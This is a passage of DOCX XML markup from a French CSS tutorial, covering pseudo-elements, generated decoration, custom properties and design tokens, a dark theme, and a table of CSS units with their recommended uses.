            <w:tcW w:type="dxa" w:w="255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::placeholder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="340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Texte indicatif</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="306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Nuance de gris</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2551"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>::marker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3402"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Puce ou numéro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Listes personnalisées</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="255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::backdrop</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="340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Arrière-plan de dialogue</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="306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Modales</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Décoration générée par CSS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.titre-externe::after {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  content: " ↗";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  font-size: .8em;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.liste-propre { list-style: none; }</w:t>
        <w:br/>
        <w:t>.liste-propre li::before {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  content: "";</w:t>
        <w:br/>
        <w:t xml:space="preserve">  display: inline-block;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  width: .5rem; height: .5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  margin-right: .6rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: 50%;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: #e0a21b;</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'accepte que du texte ou une URL d'image, jamais du HTML. Un texte inséré par </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>content</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> peut être lu par certains lecteurs d'écran mais n'est ni sélectionnable ni traduisible : réservez-le à la décoration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.3 Variables CSS : une source unique de vérité</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une variable, appelée </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>propriété personnalisée</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, se déclare avec deux tirets et se lit avec </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>var()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Elle se propage par héritage : déclarée sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>:root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>, elle est disponible partout.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un jeu de jetons de conception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:root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-primaire: #0f2e4c;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-accent: #e0a21b;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-texte: #1f2933;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --couleur-fond: #ffffff;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-xs: .5rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-s: 1rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --espace-m: 2rem;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --rayon: 6px;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --ombre: 0 4px 12px rgb(15 46 76 / 12%);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  --police-titre: "Arial", system-ui, sans-serif;</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>.bouton {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  background: var(--couleur-primaire);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  color: var(--couleur-fond);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  padding: var(--espace-xs) var(--espace-s);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  border-radius: var(--rayon);</w:t>
        <w:br/>
        <w:t xml:space="preserve">  box-shadow: var(--ombre);</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un thème sombre en dix lignes, sans dupliquer les règles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Thème sombre : seules les variables changent */</w:t>
        <w:br/>
        <w:t>@media (prefers-color-scheme: dark) {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  :root {</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --couleur-texte: #e8edf1;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --couleur-fond: #101820;</w:t>
        <w:br/>
        <w:t xml:space="preserve">    --couleur-primaire: #8fb6d9;</w:t>
        <w:br/>
        <w:t xml:space="preserve">  }</w:t>
        <w:br/>
        <w:t>}</w:t>
        <w:br/>
        <w:br/>
        <w:t>/* Variante locale d'un composant */</w:t>
        <w:br/>
        <w:t>.carte--alerte { --couleur-primaire: #a63a32; }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Les variables acceptent une valeur de repli : </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>var(--couleur, #000)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Elles peuvent aussi être modifiées par JavaScript (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>element.style.setProperty</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>), ce qui permet des animations pilotées par le thème.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:left w:val="single" w:sz="24" w:space="0" w:color="2F7D5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AF3EE"/>
            <w:tcMar>
              <w:top w:w="140" w:type="dxa"/>
              <w:left w:w="160" w:type="dxa"/>
              <w:bottom w:w="140" w:type="dxa"/>
              <w:right w:w="160" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:keepNext/>
              <w:spacing w:before="0" w:after="80" w:line="250" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="2F7D5B"/>
                <w:sz w:val="18"/>
                <w:spacing w:val="12"/>
              </w:rPr>
              <w:t>NOMMER LES VARIABLES PAR LEUR RÔLE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--couleur-primaire</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> est meilleur que </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>--bleu-fonce</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : le jour où la marque change de couleur, le nom reste juste. Nommez par fonction, pas par apparence.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>10.4 Unités : choisir la bonne échelle</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CSS propose une dizaine d'unités. Trois familles suffisent à structurer un projet : les unités relatives à la police, celles relatives à la fenêtre, et les unités fixes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.36 — Neuf unités et leur domaine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187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Unité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Référence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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 recommandé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>px</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pixel CSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Bordures, ombres, traits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="187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rem</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Taille de police racine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Typographie, espacements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>em</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Taille de police de l'élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Composant autonome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="187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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Élément parent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Largeurs fluides</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>ch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Largeur du caractère 0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Largeur de lecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="187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vw</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>vh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Fenêtre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Bandeaux pleine page, à limiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>dvh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Fenêtre dynamique mobile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pleine hauteur fiable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="187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fr</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Fraction d'espace libre</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="357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Grilles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1871"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>lh</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3572"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
